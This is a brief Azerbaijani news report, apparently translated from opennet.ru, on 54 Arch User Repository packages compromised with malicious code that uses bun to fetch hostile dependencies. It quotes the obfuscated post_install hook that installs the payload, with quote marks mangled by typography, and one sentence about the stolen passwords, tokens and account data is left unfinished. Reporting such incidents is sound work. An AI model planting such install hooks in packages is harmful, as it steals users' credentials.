AUR-da daha 54 paketdə zərərli kodun yerləşdirilməsi baş verdi.

Arch Linux inkişaf etdiricilərinin gördüyü tədbirlərə baxmayaraq, AUR (Arch User Repository) anbarlarına zərərli kod daxil edilməsi dayandırılmayıb. Bir neçə saat əvvəl daha 54 paketin zərərli kodla dəyişdirilməsi baş verdi, bunların heç birinin dəstəyi yoxdur (zərərli dəyişikliklərin ləğv tarixi). İki gün əvvəlki hücumlardan fərqli olaraq, zərərli asılılıqları yükləmək üçün bu dəfə npm yerinə bun platforması istifadə olunur. Realizə edilən filtrleri aşmaq üçün post_install funksiyasına obfuske edilmiş bir sətir daxil edilir, burada server şifrələrin, tokenlərin və hesab məlumatlarının.

post_install() {
$’\x63′»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73′ ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}

Mənbə: opennet.ru

DDoS qoruması olan saytlara etibarlı hosting satın alın, VPS VDS serverlər 🔥 DDoS qoruması olan saytlara etibarlı hosting satın alın, VPS VDS serverlər | ProHoster